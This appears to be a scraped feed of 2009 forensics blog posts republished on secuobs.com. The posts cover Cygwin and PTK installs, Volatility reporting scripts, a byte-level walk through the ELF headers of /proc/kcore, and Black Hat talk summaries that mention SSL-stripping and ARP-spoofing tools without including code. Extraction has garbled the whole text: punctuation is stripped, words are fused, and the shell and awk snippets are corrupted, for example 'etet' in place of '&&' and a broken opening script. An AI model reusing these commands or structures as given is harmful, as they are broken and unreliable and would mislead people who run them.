if -eq 1 check for arguments then time 3 if one only filename exists, sleep for 3 seconds filename 1 set filename else time 2 else, we'll sleep for 2 seconds filename 1 set filename fi recordmydesktop -windowid xwininfo grep Window id sed -e s xwininfo Window id s -o filenameogv -delay time --no-sound ffmpeg -i filenameogv -b 384000 -s 640x480 -pass 1 -passlogfile log-file filenameflv IMAGE http://www.secuobs.com/revue/news/127566.shtmlhttp://www.secuobs.com/revue/news/127566.shtml Secuobs.com : 2009-07-31 09:54:55 - JL's stuff - Note I am reusing a post from my forensics class at John Jay College This will be used as a reference for an upcoming post on Volatility module installation So be patient, there is more to come This post goes over an installation of Cygwin which is a Linux-like environment for windows Since most of you have Windows machines, this will allow you run tools that normally run under Linux Unix environments The setup file is here When you download setup, double click it You should see the following Press Next'' and choose Install from the Internet'' Choose where to install Cygwin by default it is in C Cygwin IMAGE Cygwin will create a directory in which it will store the its files during installation After installation you can delete the folder The default location is the desktop IMAGE Select your internet connection The default is OK IMAGE Select a mirror mirrorserviceorg is good IMAGE Press Next'' You should see the following IMAGE Next you will see a list of packages you can download By default these are organized by category IMAGE If you press the plus signs on the left hand side, it will open up the category and you can select specific packages IMAGE Here is a list of packages you need organized by category From the Base category1 Everything From the Devel category1 Gcc C, C , Fortran compilers 2 gcc-mingw Mingw32 support headers and libraries for GCC 3 gcc2 Version XXXX whatever is latest of C, C , Fortran compilers 4 gdb The GNU Debugger 5 make The GNU version of the make' utility 6 mingw-runtime MinGW Runtime 7 openssl-devel The OpenSSL development environment From the Editors category1 Nano A pico clone text editor with extensions works like pico 2 vim Vi Improved enhanced vi editor From the Interpreters category1 Perl 2 Python From the Utils category1 until-linux Random collection of Linux utilities 2 file 3 ELFIO From the Text category1 less A file pager program, similar to more 1 After you have made your selections, press next for installation to begin This part is the actual installation, and may take some time Just let it finish After it finishes you will be asked if you want to create shortcuts on the desktop Make sure to click Finish Running Cygwin When you run Cygwin for the first time, it might take a little longer to start up This is because it is configuring a few more files for your environment Then you should get a command line prompt that looks like You are now able to work on your programs at home on your windows machines IMAGE IMAGE http://www.secuobs.com/revue/news/126848.shtmlhttp://www.secuobs.com/revue/news/126848.shtml Secuobs.com : 2009-07-23 05:36:36 - JL's stuff - So if you follow me or Moyix on twitter, you will have seen some updates about some cool new plugins by MHL for Volatility Other volatility plugins are listed on the Forensics Wiki Moyix has also released his slides from his recent talk on combining memory and registry analysis Awesome stuff Volatility was also recently mentioned in Episode 522 of Hak5 Whats in your RAM along with some other very cool tools like Matthieu Suiche's win32dd Volatility has been under heavy development lately and has issued a call for bugs So if you are currently a user and have encountered something odd, please report it so that it may be fixed You can do so by sending an email to the developer's listserv In order to get the newest code updates, you can download Volatility from the svn repository simply following the instructions on the site For installation instructions you can check out the install manual written by yours truly - BTW, Volatile Systems is also currently hiring So if memory forensics and reverse engineering are within your interests you can apply for a job that includes both It's an exciting time and I'm sure there will be much more to come IMAGE http://www.secuobs.com/revue/news/123803.shtmlhttp://www.secuobs.com/revue/news/123803.shtml Secuobs.com : 2009-06-05 20:14:06 - JL's stuff - Coming to NYC this summer:NeFX 2009The First Annual ACM Northeast Digital Forensics ExchangeJuly 20-21, 2009 @ John Jay College of Criminal Justice/CUNY NYCThe ACM Northeast Digital Forensics Exchange NeFX is a workshop,sponsored in part by the National Science Foundation, to fostercollaboration on digital forensics and information assurance betweenfederal and state law enforcement, academia, and industry Our goal isto bring together leading practitioners and academics in order toyield partnerships that advance research on digital forensic sciencethrough mutual sharing of the problems of practice and researchThis should be interesting They have some good speakers lined up andsome interesting topics for tutorials Check the website for moredetailsIMAGEhttp://www.secuobs.com/revue/news/106341.shtmlhttp://www.secuobs.com/revue/news/106341.shtml Secuobs.com : 2009-06-01 16:55:33 - JL's stuff - I would have had this up sooner, but I was out of town last week and theweek before was the conference Anyway, I promised I would post theslides and supporting files for my CEIC classes I don't have theslides for the foreign language talk, but I didn't promise to givethose out ;-How to Address ESI Involving Encryption from Disk Level to IndividualFiles with David Lyman ppt | pdfSpoofing/hacking/memory analysis talk pdfHere is the ARP spoofing perl script we used and some of yourequested: arpspoofpl You must install Nemesis for the script towork, or you can modify it to use another packet crafting programAlso, depending on the distro you might have to modify the path forthe arp command for Fedora it is /sbin/arp Anyway, you should beable to modify it on your ownThe agenda had changed somewhat for the second talk, since I had takenthe class over from someone else at the last second I would like tothank Prof Bilal Khan for all of his help and his donation of thevulnerable VM :- This lab is representative of some of the courses inthe Forensic Computing graduate program at John Jay CollegeFor those of you who would like more VM machines to hack into you cango to de-icenetAlso, we used Wireshark and Backtrack 4I would also like to thank AAron and Moyix from the Volatilitycommunity for their insight as well :-IMAGEhttp://www.secuobs.com/revue/news/104428.shtmlhttp://www.secuobs.com/revue/news/104428.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - So after reading about the new search engine called Cuil, I couldn't waitto try it out I didn't realize it had gone live until after readingabout how much it failed Most people complained about not being ableto pronounce ``Cuil'' in spite of lots of publicity that it ispronounced ``Cool'' so maybe some people didn't bother to read Therewere also disputes about what, if anything, Cuil returned duringsearching So I decided to give it a try myselfI decided to search for penguin According to the right hand side ofCuil, there are 66,229,028 results for penguinFirst of all, the website design is really nice I know that doesn'tmatter as much, but I had to say that :- I also like the columns, theshort snippets and the pictures to the side I have to agree with Cuilthat showing a picture can help the user determine relevance FAQ #7There's even some tabs and a pull down menu across the top of thesearch to help narrow down your interest, such as ``Penguin Books'',``Penguin Classics'', ``Penguin Putnam'', ``Linux Penguin'' etc Ok,that's niceNow for the vanity searches First off, I'm not some conceited schmuckwho likes to google herself all the time, but I know what should popup when my name is entered Here it goes: there are 3,619,749 resultsfor the search term ``jamie levy'' without quotesOk, so something of mine is not on the first page like on Google Bigdeal There's something of mine on the second page:IMAGEIt's a tutorial of mine It's kind of old, and it's kind of buried inmy site I thought I would at least see the index of my site ifanything Also, I'm not really sure what that picture is next to mypage I know I didn't put it thereOk, on the third page I see the same tutorial above as well as anotherOLD tuturial of mine that I forgot to take offline after I rewrote itSo that's bizarre, why would the first resulting tutorial repeat tothe second page What is that picture next to it How did they findthe old Unix tutorial:This seems to be a pattern, however as I found more repeats of theseresults and finally my index page on the fourth page of resultsHowever, there is finally a correct picture next to the wiresharktutorial:IMAGEAfter looking just little bit more I found another old course page ofmine, which repeats as well:IMAGEOk, so what happens if I decide to narrow down my search and look formyself at the place where I work Cuil only shows four results thoughit claims there are 43,752 results, three of which we have alreadyseen above Look next to the Unix tutorial, do you find anythingcurious there I did:IMAGEWho is that man in the picture He's so mysterious I know I didn'tput him there Here's a closeup:IMAGEBizarre is all I can say Does his picture seem relevant to Unix Iwouldn't think so but it seems like some of these pictures are justrandom Also the stuff that Cuil pulls up seems as if it's from someolder snapshot I haven't quite figured it outWell, I won't bore you with details of other people I ``Cuil''ed, butI thought it was interesting that I couldn't find my past adviser atall when there are 815,000 pages in Google related to his nameIMAGEI guess he isn't ``Cuil'' enough :-IMAGEhttp://www.secuobs.com/revue/news/97787.shtmlhttp://www.secuobs.com/revue/news/97787.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - I have decided to release some more code I'm not claiming any of this isgood, but it has served a purpose either personally or in theclassroom at some point The last item added is a distance perl scriptto measure Levenshtein distance of two pcap filesI wrote this for some experiments with malware some time back Ifigured I should share it in case it is of use to someone before Imisplace it :- More details are included in the script itselfIMAGEhttp://www.secuobs.com/revue/news/97786.shtmlhttp://www.secuobs.com/revue/news/97786.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - This is for 32bitAccording to elfh:#define EI_NIDENT 16typedef struct{unsigned char e_identEI_NIDENT; /* Magic number and other info */Elf32_Half e_type; /* Object file type */Elf32_Half e_machine; /* Architecture */Elf32_Word e_version; /* Object file version */Elf32_Addr e_entry; /* Entry point virtual address */Elf32_Off e_phoff; /* Program header table file offset */Elf32_Off e_shoff; /* Section header table file offset */Elf32_Word e_flags; /* Processor-specific flags */Elf32_Half e_ehsize; /* ELF header size in bytes */Elf32_Half e_phentsize; /* Program header table entry size */Elf32_Half e_phnum; /* Program header table entry count */Elf32_Half e_shentsize; /* Section header table entry size */Elf32_Half e_shnum; /* Section header table entry count */Elf32_Half e_shstrndx; /* Section header string table index */} Elf32_Ehdr;Sizes for ELF32_* in bytes:Word: 4Half: 2Off: 4Addr: 4Looking at a regular binary like ls for example:$ dd if=/bin/ls bs=52 count=1|xxd1+0 records in1+0 records out52 bytes 52 B copied, 36108e-05 s, 14 MB/s0000000: 7f45 4c46 0101 0100 0000 0000 0000 0000 ELF0000010: 0200 0300 0100 0000 0099 0408 3400 0000 40000020: ec7f 0100 0000 0000 3400 2000 0800 2800 4 0000030: 2000 1f00 I'm using the ELF manual to analyze thisThe first line 16 bytes is the e_ident value which consists of:The ``magic'' value for the first four characters - 7f45 4c46The file class EI_CLASS - 0x1 ELF32CLASSData encoding EI_DATA - 0x1 ELFDATA2LSB little endianFile version EI_VERSION - 0x1 currentStart of padded bytes EI_PADOn the second line e_type 0x2 tells us it is an executable filee_machine value 0x3 tells us that this was compiled on IntelArchitecturee_version value 0x1 tells us it is currente_entry virtual address to which to control is given is 0x8049900e_phoff Program headers start at offset 0x34On the third line 0x17fec is the section header offset e_shoffe_flags value 0x0 tells us that no flags are sete_ehsize value of 0x34 tells that the header is of size 52 bytesdecimale_phentsize value of 0x20 tells that one entry in the program headertable size is 32 bytese_phnum value of 0x8 tells us the number of entries in the programheader table is 8e_shentsize value of 0x28 tells us the size of one entry in thesection header table is 40 bytesOn the fourth linee_shnum value of 0x20 tells us that number of entries in the sectionheader table is 32e_shstrndx value of 0x1f holds the section header table index of theentry associated with the section name string tableSo what does /proc/kcore look like# dd if=/proc/kcore bs=52 count=1|xxd1+0 records in1+0 records out52 bytes 52 B copied, 39321e-05 s, 13 MB/s0000000: 7f45 4c46 0101 0100 0000 0000 0000 0000 ELF0000010: 0400 0300 0100 0000 0000 0000 3400 0000 40000020: 0000 0000 0000 0000 3400 2000 0300 0000 4 0000030: 0000 0000 The first line is the same as aboveThe second line:e_type 0x4 tells us it is a core file ET_CORE *e_machine value 0x3 tells us that this was compiled on IntelArchitecturee_version value 0x1 tells us it is currente_entry virtual address to which to control is given is 0x0e_phoff program headers start at offset 0x34* this is useful to know if we are dealing with a core fileIn the third line:e_shoff value is 0x0 letting us know there is no section headeroffsete_flags value 0x0 tells us that no flags are sete_ehsize value of 0x34 tells that the elf header is of size 52 bytesdecimale_phentsize value of 0x20 tells that one entry in the program headertable size is 32 bytese_phnum value of 0x3 tells us the number of entries in the programheader table is 3e_shentsize value of 0x0 tells us that there is no section headerThe fourth line values are all 0x0To make your life easier here is a C program that will extract all ofthat information for you :- You must be root to run itNote: I know I could have done this a bit more elegantly, but decidedagainst thatIMAGEhttp://www.secuobs.com/revue/news/97785.shtmlhttp://www.secuobs.com/revue/news/97785.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Well, it's been a while since I've written anything This is just a briefupdate for those who care I've been busy and I switched locationsfor the semester I'm not going to go over everything that's happenedsince my last post, but I'm teaching at John Jay College this semesterinstead of Queens College It's still CUNY :- and everything is stillcoolOh, our paper was accepted :- this is not the final copy, but youget the gist Edit: The schedule is up nowWhat's nextIMAGEhttp://www.secuobs.com/revue/news/97784.shtmlhttp://www.secuobs.com/revue/news/97784.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - PyFlag is now available on Windows I haven't had a chance to try it onWindows, but I will soon and then I'll report on itI've used it on Linux however, and it's really nice :-IMAGEhttp://www.secuobs.com/revue/news/97783.shtmlhttp://www.secuobs.com/revue/news/97783.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - There's an interesting talk coming up at John Jay College:The Center for Cybercrime StudiesThe John Jay College of Criminal JusticePresentsVisual Forensic AnalysisSpeaker: Greg ContiComputer Science DepartmentUnited States Military AcademyFor decades hex was the common tongue of reverse engineers andforensic analysts, but we can do better Hex editors are the SwissArmy knives of low level analysis and have evolved significantly, butare now at a local maximum With the tiny textual window hex provides,it is difficult, if not impossible to understand the big picturecontext and inner workings of binary objects - files, file systems,process memory, and network traffic While there are helpful tools toanalyze the special case of executable files, little work exists tohelp address the general case of all types of binary objects Thistalk presents visual approaches to improve the art and science offorensic analysis, diffing, and reverse engineering, both in thecontext independent case where little is known about the raw structureof the binary data and at the semantic level where external knowledgecan be used to inform analysis If you are faced with low levelanalysis tasks, you should attend this talkGreg Conti is an Assistant Professor of Computer Science at the UnitedStates Military Academy His research includes security datavisualization and web-based information disclosure He is the authorof Security Data Visualization No Starch Press and the forthcomingGoogling Security Addison-Wesley His work can be found atwwwgregconticom and wwwrumintorgDate: September 24, 2008Time: 3:30 PMLocation: Mathematics Conference Room - 4238N445 West 59th Street, New York City 10019RSVP: Nicole Daniels at 212-237-8920 or email ndaniels@jjaycunyeduFor additional information please contact Professor Doug Salane,Director of the Center for Cybercrime Studies, at 212-237-8836 oremail dsalane@jjaycunyeduIMAGEhttp://www.secuobs.com/revue/news/97782.shtmlhttp://www.secuobs.com/revue/news/97782.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - It will take me a few posts to go through the kcore file The lastkcore post dealt only with ELF headers of the kcore file After theELF header ends, there are 3 program headers:From elfh we see that the structure of a program header is:typedef struct{Elf32_Word p_type; /* Segment type */Elf32_Off p_offset; /* Segment file offset */Elf32_Addr p_vaddr; /* Segment virtual address */Elf32_Addr p_paddr; /* Segment physical address */Elf32_Word p_filesz; /* Segment size in file */Elf32_Word p_memsz; /* Segment size in memory */Elf32_Word p_flags; /* Segment flags */Elf32_Word p_align; /* Segment alignment */} Elf32_Phdr;A look at the first program header below:0000030: 0000 0000 0400 0000 9400 0000 0000 0000 0000040: 0000 0000 d807 0000 0000 0000 0000 0000 0000050: 0000 0000The first program header is of type PT_NOTE Auxiliary info which hasa value of 0x4We can see that the offset is 0x94The filesize has a value of 0x7d8All other parts of the struct are set to 0x0A look at the second program header below:0000050: 0000 0000 0100 0000 0010 8038 0000 80f8 80000060: 0000 0000 00e0 ff06 00e0 ff06 0700 0000 0000070: 0010 0000The type is of type PT_LOAD 0x1 loadable program segmentThe offset is 0x38801000vaddr is 0xf8800000 vmallocfilesz and memsz are both 0x6ffe000flags are 0x7 PF_R | PF_W | PF_Xpage alignment is 0x1000 size of a page - 4096The other remaining part of the structure p_paddr is 0x0The third program header looks like:0000070: 0010 0000 0100 0000 0010 0000 0000 00c0 0000080: 0000 0000 0000 0038 0000 0038 0700 0000 880000090: 0010 0000The type is of type PT_LOAD 0x1 loadable program segmentThe offset is 0x1000 size of a page - 4096vaddr is 0xc0000000 start of lowmemfilesz and memsz are both 0x38000000 size of kcore-4096flags are 0x7 PF_R | PF_W | PF_Xpage alignment is 0x1000 size of a page - 4096The other remaining part of the structure p_paddr is 0x0From my messages file to compare:Sep 15 12:28:57 kanga kernel:Memory: 2060724k/2087616k available2252k kernel code, 25548k reserved, 1182k data, 284k init, 1170112khighmemSep 15 12:28:57 kanga kernel: virtual kernel memory layout:Sep 15 12:28:57 kanga kernel: fixmap : 0xffc53000 - 0xfffff000 3760kBSep 15 12:28:57 kanga kernel: pkmap : 0xff400000 - 0xff800000 4096kBSep 15 12:28:57 kanga kernel: vmalloc : 0xf8800000 - 0xff3fe000 107MBSep 15 12:28:57 kanga kernel: lowmem : 0xc0000000 - 0xf8000000 896MBSep 15 12:28:57 kanga kernel: init : 0xc0761000 - 0xc07a8000 284kBSep 15 12:28:57 kanga kernel: data : 0xc063337f - 0xc075ab88 1182kBSep 15 12:28:57 kanga kernel: text : 0xc0400000 - 0xc063337f 2252kBNotesThe next three sections will use this structure:struct memelfnote{const char *name;int type;unsigned int datasz;void *data;};Looking at the first note only the interesting part, the rest iszeroed out:0000090: 0010 0000 0500 0000 9000 0000 0100 0000 00000a0: 434f 5245In this case the items shown are not in the same order of the structThis is because they have been placed in a slightly different orderFirst we have the size of the name: 0x5 strlenCORE+1Then the data size: 0x90 size of elf_prstatus structThen the type: 0x1 NT_PRSTATUSThen the name itself: COREAnd finally the data, which has been zeroed out not shownThe next note looks like the following:0500 0000 7c00 0000 |0000140: 0300 0000 434f 5245 0000 0000 0052 0000 CORER0000150: 0000 0000 0000 0000 0000 0000 0000 0000 0000160: 0000 0000 0000 0000 766d 6c69 6e75 7800 vmlinux0000170: 0000 0000 0000 0000 726f 2072 6f6f 743d ro root=0000180: 2f64 6576 2f56 6f6c 4772 6f75 7030 302f /dev/VolGroup00/0000190: 4c6f 6756 6f6c 3030 2072 6867 6220 7175 LogVol00 rhgb qu00001a0: 6965 7400 0000 0000 0000 0000 0000 0000 iet00001b0: 0000 0000 0000 0000 0000 0000 0000 0000 00001c0: 0000 0000 0000 0000First we have the size of the name: 0x5 strlenCORE+1Then the data size: 0x7c sizeofstruct elf_prpsinfoThen the type: 0x3 NT_PRPSINFO Then the name itself: COREAnd finally the data, which uses the elf_prpsinfo structure:struct elf_prpsinfo{char pr_state; /* numeric process state */char pr_sname; /* char for pr_state */char pr_zomb; /* zombie */char pr_nice; /* nice val */unsigned long pr_flag; /* flags */__kernel_uid_t pr_uid;__kernel_gid_t pr_gid;pid_t pr_pid, pr_ppid, pr_pgrp, pr_sid;/* Lots missing */char pr_fname16; /* filename of executable */char pr_psargsELF_PRARGSZ; /* initial part of arg list */};The data consists of:pr_state 0x0pr_sname 0x52 Rpr_zomb 0x0Executable file name pr_fname "vmlinux"Saved command line pr_psargs up to 80 charactersro root=/dev/VolGroup00/LogVol00 rhgb quietThe rest is zeroed out from a memset commandThe third note denotes information about the current task Here ispart of it:0500 0000 9006 0000 00001d0: 0400 0000 434f 5245 0000 0000 0000 0000 CORE00001e0: 0020 b2f0 0200 0000 0021 4000 ffff ffff @00001f0: 7800 0000 7800 0000 7800 0000 b086 8af0 xxx0000200: b086 8af0 4072 63c0 0004 0000 0000 4000 @rc@0000210: 0100 0000 0000 0000 0000 0000 0100 0000 0000220: 494c 6a33 c10a 0000 2fd2 1d00 0000 0000 ILj3/0000230: 85b4 abc6 0c01 0000 6134 0c00 0000 0000 a40000240: 0000 0000 0000 0000 5669 0d00 0000 0000First we have the size of the name: 0x5 strlenCORE+1Then the data size: 0x690 sizeofstruct task_struct found inlinux/schedhThen the type: 0x4 NT_TASKSTRUCT Then the name itself: COREAnd finally the data, which consists of `current' which is the currentthread not shown aboveNow we must dissect task_struct info, which we'll do a bit laterIMAGEhttp://www.secuobs.com/revue/news/97781.shtmlhttp://www.secuobs.com/revue/news/97781.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Yay Another former student, Fausto Dutan, is in the finals one gotthird place last year There's also a MS student from John Jay -Richard Alcalde Go CUNY :- Good luck to all of the finalistsEdit 10/17: Richard Alcalde got 1st place Congrats Richard :-IMAGEhttp://www.secuobs.com/revue/news/97780.shtmlhttp://www.secuobs.com/revue/news/97780.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - In case you missed it, I've created a patch for PTK You can find it hereThis fixes the path issue for those who have Sleuthkit installed in/usr/local/bin PTK 10 will be released soon and this will no longerbe an issueIMAGEhttp://www.secuobs.com/revue/news/97779.shtmlhttp://www.secuobs.com/revue/news/97779.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - It's been a long while For that I apologize I guess I'm not a verygood blogger when the semester is in full stride Anyway, there's anew code release for Permeate, this time with the MITM detection builtin A paper we recently submitted to ICC 09 is available there aswell Shouts to Jarek and BK :-EnjoyIMAGEhttp://www.secuobs.com/revue/news/97778.shtmlhttp://www.secuobs.com/revue/news/97778.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - During my forensics class I started thinking of a way to make it easierfor my students to sort through the output of Volatility and startingwriting a little perl script to create an html report of runningprocesses, open files and dllsThis is not finished as there is more information that I would like tocorrelate from the output of Volatility But if you are somewhatcurious, this is what I have so far: vol2htmlpl You can see anexample report here The output files for this report and the perlscript are bundled together here There is minimal error checkingTo use, first redirect the output of Volatility for pslist, dlllistand files to text files:/volatility pslist -f memdd pslisttxt/volatility files -f memdd filestxt/volatility dlllist -f memdd dlllisttxtThen feed the perl script these files:/vol2htmlpl -pslist pslisttxt -files filestxt -dlllist dlllisttxtThere is more comingIMAGEhttp://www.secuobs.com/revue/news/97777.shtmlhttp://www.secuobs.com/revue/news/97777.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Recently I received a VMWare image to work on I had installed VMwareServer 108 on my CentOS 52 laptop because 20 is just painfulUnfortunately the image had been created with a newer version ofWorkstation rendering it incompatible with my install I found theVMware converter, but it wasn't much help since I'm on a LinuxmachineI created a new default machine using VMware Server with the basicsettings matching that of the target machine, copied the resultingvmx file into the folder of the target machine I could have justmodified the original vmx file, but just decided to start overcleanlySo now the vmware machine tries to boot, but fails with the followingmessage:One or more of your disk files were created by a more recent versionof VMware software and are not supported by this version of VMwareServerThen I modified the vmdk descriptor file from:ddbvirtualHWVersion = "7"toddbvirtualHWVersion = "4"Worked like a charm :-I don't know if this will work in every case, but it might be helpfulto someoneIMAGEhttp://www.secuobs.com/revue/news/97776.shtmlhttp://www.secuobs.com/revue/news/97776.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - So I finally broke down and created a Twitter account recently Itstarted when I began watching a few people on Twitter They often hadvery interesting Tweets related to my interests After a while Irealized that it would be easier to keep up with these Tweets byfollowing these people with my own Twitter accountNow, the reason I haven't had one up to this point was mostly becauseI was afraid of the privacy issues While teaching undergraduateclasses I have often been asked if I have a Facebook, Myspace, Twitteror whatever account so that students could ``befriend'' me Till nowI have abstained from these types of accounts mostly to avoid thesetypes of student/teacher online friendships Not that I dislike mystudents I don't, but I just figured it might get uncomfortable atsome pointI am wondering if others have struggled with this issue I know thereare some people on Twitter who teach classes like meI have made my Tweets private for now to make sure that I know who isfollowing me but can you ever *really* know I know this isprobably not the most favorable setup, but it makes me feel somewhatbetter that my inconsequential Tweets are not just openly exposed toeveryoneThe people on Twitter are cool and information they give rocks So farI am really enjoying it :-IMAGEhttp://www.secuobs.com/revue/news/97775.shtmlhttp://www.secuobs.com/revue/news/97775.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - I made a small update to vol2htmlpl Since there are a lot of html filesbeing generated, I thought it might be nice to allow the user tospecify an output directory So there is an extra optional option:-D if you want to print all html files to the another directory If thedirectory does not exist, it is created The script currently does notcheck if files exist in this directory and will clobber any files withthe same nameI have also added some more information about the open files You cannow see all processes that have the same open files and how many timeseach process has a file open To do this, click on the process ofinterest and click open files Each file name is linked to a report,which contain a list of all processes by pid that have the file openand how many times that process has the file open There is a link toeach pid as wellAlso new there is a link to the indexhtml file at the end of eachreportSince my website is down for now, you can get the updated script hereupdated 1/11/09 and moved from google code which was messing up somethingsHopefully this is helpfulAnother update: Here's a second report to look atStill more to comeIMAGEhttp://www.secuobs.com/revue/news/97774.shtmlhttp://www.secuobs.com/revue/news/97774.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - This is a late post, but I've been busy I learned about this videofrom Moyix on the Volatility irc channel #volatility on freenodeIt's nice that people like vol2html It encourages me to add more toitThere's more info here if you are interested I'm glad to see thatmemory analysis is getting more visibility Cool stuff EnjoyDale Beauchamp - DojoSec January 2009 from Marcus Carey on VimeoIMAGEhttp://www.secuobs.com/revue/news/97773.shtmlhttp://www.secuobs.com/revue/news/97773.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Recently I had to see if two CDs were identical I had the hash value ofthe iso for the desired content so I decided to check the hash forboth CDs There is really not that much to this post, but just in casesomeone ever needs to know how to do this I'll give you the commandline how-toIn my case, md5sum /dev/cdrom did not work Now there is no reason tocopy the CD to an iso file in order to do this You can just use ddand pipe the output into md5sum or sha1sumI found that just doing a straight dd without extra options did notwork So you should use isoinfo to get the logical block size and thevolume size to feed to dd bs="Logical block size" and count="Volumesize" I decided to put this all into a bash script you can find hereThe code is shown below:INFO=`isoinfo -d -i /dev/cdrom |awk '{ if $1 ~ /Volume/ etet $2 ~ /size/ print $4; else if $1 ~ /Logical/ etet $2 ~ /block/ etet $3 ~ /size/ print $5 endif }'`INFO=$INFOecho "Logical block size: ${INFO0}"echo "Volume size: ${INFO1}"echo "Now executing: "echo "dd if=/dev/cdrom bs=${INFO0} count=${INFO1}conv=notrunc,noerror,sync | md5sum"dd if=/dev/cdrom bs=${INFO0} count=${INFO1} conv=notrunc,noerror,sync | md5sumIt's not the most beautiful solution, but there it is This uses md5,for other hashes just modify the script as needed Also if your CDdevice is not /dev/cdrom modify that as wellIMAGEhttp://www.secuobs.com/revue/news/97772.shtmlhttp://www.secuobs.com/revue/news/97772.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Having some spare time over the weekend caused me to attempt aninstallation of PTK on my spare CentOS box I've succeeded in gettingit to run under Fedora, so I had a little bit of an idea of what I wasgetting myself intoBefore you get started, make sure you have the following packagesinstalled:mysqlmysql-serverphpphp-mysqlphp-mbstringhttpdSleuthkitIf you need EWF or AFF support you can install them from:libewfafflibAfter installing everything, you need to initialize MySQL as root:# /sbin/chkconfig mysqld on# /sbin/service mysqld start# mysqladmin -u root password 'new-passwd'You must use quotes around the new-passwd you choose, and don't forgetwhat it isYou must also start the http serveras root:# /sbin/service httpd startNow you are ready to download and install PTK from sourceforge Idownloaded version 105In order to install PTK, extract the tarball in your webserverdirectory as root:# cd /var/www/html# lsptk-105targz# tar -xzf ptk-105targz# chown -R apacheapache ptkThe last command above makes sure that all files are owned by thewebserver userNow we have address a problem that still exists regarding theinstallation script Go inside the ptk folder At this point, youshould see the installphp script If you have Sleuthkit installed in/usr/local/bin the install script will not work as expected becausethis is not in its path You can find out where it is installed bytyping which plus one of the Sleuthkit commands eg:$ which istatIf the path returned is /usr/local/bin then you can modify theinstallphp file by changing entries like:$istat = shell_exec"which istat";to$istat = shell_exec'export PATH="/usr/bin:/usr/local/bin"; whichistat';and so onIf all goes well, you will get to the options screen, which shouldlook something like the following:Fill everything out as you like including distro and press nextNow, when I installed PTK under Fedora, everything was ready to go atthis point With CentOS, it was another story For some reason, thingsdid not get updated with the extra configure scriptsSo, you have to manually add the locations for your Sleuthkitexecutables in the following files:config/confphpconfig/confplwhere config is the folder within the ptk folder/var/www/html/ptk/config If you open up confpl it may look like:installdir = '/var/www/html/ptk/',md5_bin = '/usr/bin/md5sum',sha1_bin = '/usr/bin/sha1sum',fsstat_bin = '',mmls_bin = '',fls_bin = '',istat_bin = '',snipNotice that there are some blank entries Therefore you will have toenter the correct path for those executablesAll right, so I'm not going to make you do it :- Here are themodified files for my CentOS box Just make sure you put then in theright places, and you might have to chown them as wellEnjoy and hope this helps someone out thereIMAGEhttp://www.secuobs.com/revue/news/97771.shtmlhttp://www.secuobs.com/revue/news/97771.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Though it's almost too late for this, I thought I would write briefly onBH DC I had a blast while I was there and there were some veryinteresting talks In case you are interested in the content of thesetalks, slides, papers, demos and videos are being uploaded to thissite:https://wwwblackhatcom/html/bh-dc-09/bh-dc-09-archiveshtmlThe talks I liked the most were:Let Your Mach-0 Fly by Vincenzo IozzoThis talk describes how to replace a running process in memory withanother by unmapping the current process, replacing the header andenveloping the old process with the new process It was really cool tosee the demos, but if you watch the video if it is uploaded, youwill see he has trouble with the safari example I didn't have time toconfirm my suspicions, but I thought this is because he didn't supplythe entire path to the desired executable I came to him after thetalk to ask about this, but things were so rushed at the end that Ididn't get a chance to ask I emailed him and he replied: ``I foundthe problem, I forgot to patch a known bug before my talk,'' so heseems to have found the problem The code for this one is availableonlineNew Techniques for Defeating SSL/TLS by Moxie MarlinspikeI wasn't completely sure at first that this was going to be aninteresting talk, but it turned out very nice The title is misleadingin that it wasn't really about SSL in general but about httpsspecifically He has a tool that can MITM connections bystripping out references to https to http While that is not asinteresting, the more interesting part comes into play with thecreation and usage of fake certificates to make things "secure" Itwas also funny how he used the favicon feature to make give a positiveindicator by switching it with a padlock I'm not sure how effectiveit would be against items like Yahoo's sign in seal among others,but there are other interesting possibilities The code for hispresentation is also available online updated linkAttacking IntelR Trusted Execution Technology by Joanna Rutkowskaand Rafal WojtczukThis was an awesome talk It was a pleasure to see this team of famousresearchers talk about the intense of TXT and how they could exploitit The video for this one is up, it would definitely be worthwhile towatch it The video for this one is available online Joanna has alsoposted the videos from the slides here:http://theinvisiblethingsblogspotcom/2009/02/attacking-intel-txt-paper-and-slideshtmlDefending Against BGP Man-In-the-Middle Attacks by Earl ZmijewskiThis was another awesome talk I didn't know the fine details aboutrouters before the talk, but the MITM attack is quite simple It wasalso very interesting to see how they came to a solution for detectingthese attacks It was also interesting that there after they hadrefined their detection algorithm they only found three instances ofthe attack "in the wild", all of which could be explained Anothermust read/watch I think, and Earl is entertaining :-IMAGEhttp://www.secuobs.com/revue/news/97770.shtmlhttp://www.secuobs.com/revue/news/97770.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - This is almost a non-post, but who knows, it might be useful tosomeone So today I while installing Ida Pro on CentOS, I hit asmall snafu Everything went well for key extraction: here's a nicetutorial for that However after I retrieved the key, I placed itaccording to the README file in the $HOME/idapro directoryHowever, when running it I was faced with the following problem:$ /idal/idal: error while loading shared libraries: libstdc++so5: cannotopen shared object file: No such file or directoryI noticed that my library was incompatible since it was libstdc++so6Luckily, there are ``compat'' packages that contain these olderlibraries You can install them with yum:# yum install -y compat-libstdc++-33i386At this point, IDA Pro starts up nicely:IMAGEhttp://www.secuobs.com/revue/news/97769.shtmlhttp://www.secuobs.com/revue/news/97769.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Earlier I wrote about installing Pyflag on Fedora 8 This time, I decidedto go for the CentOS installFirst off, this tutorial is not for the faint of heart and as always Itake no responsibility if things go wrong on your endI 